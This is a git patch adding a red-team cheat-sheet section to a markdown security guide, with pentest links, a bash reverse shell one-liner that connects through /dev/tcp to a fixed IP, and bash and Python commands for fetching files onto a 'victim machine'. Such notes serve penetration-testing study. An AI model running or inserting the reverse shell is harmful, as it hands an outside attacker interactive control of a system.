From 06210e1e0f8107df953761b96da679d092649256 Mon Sep 17 00:00:00 2001
From: Andres Hermosilla <ahermosilla@barracuda.com>
Date: Wed, 6 Sep 2017 16:47:50 -0700
Subject: [PATCH] Added reverse shell, downloading content to security red team
 guide

---
 security-red-team.md | 29 ++++++++++++++++++++++++++++-
 1 file changed, 28 insertions(+), 1 deletion(-)

diff --git a/security-red-team.md b/security-red-team.md
index 84ebb0f..2e893b5 100644
--- a/security-red-team.md
+++ b/security-red-team.md
@@ -9,4 +9,31 @@
 - http://seclist.us/pyjenkinstoolkit-is-a-jenkins-penetration-test-toolkit.html
 - https://pen-testing.sans.org/blog/2017/02/02/pen-test-poster-white-board-bash-bashs-built-in-netcat-client
 - https://www.pentesterlab.com/exercises/play_xxe/course
-- https://www.hackthissite.org/
\ No newline at end of file
+- https://www.hackthissite.org/
+- https://securityreliks.wordpress.com/2010/08/20/devtcp-as-a-weapon/
+- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+- https://tools.kali.org/information-gathering/enum4linux
+
+
+### Reverse Shell
+```shell
+# Reverse shell with your attacking box is listening on port 444
+/bin/bash -i > /dev/tcp/64.228.93.35/444 0<&1 2>&1 
+```
+
+### Download Files
+You may not always have `curl` or `wget` available to download files on the victim machine.
+
+```shell
+exec 3<>/dev/tcp/ahermosilla.com/80
+echo -e "GET / HTTP/1.1\r\nHost: ahermosilla.com\r\nConnection: close\r\n\r\n" >&3
+cat <&3
+
+# Python 3.x
+python -c 'import urllib.request; urllib.request.urlopen("http://example.com/").read()'
+
+# Python 2.7
+python -c 'import urllib2; print urllib2.urlopen("http://example.com/").read()'
+```
+- https://stackoverflow.com/questions/645312/what-is-the-quickest-way-to-http-get-in-python
+- http://xmodulo.com/tcp-udp-socket-bash-shell.html
\ No newline at end of file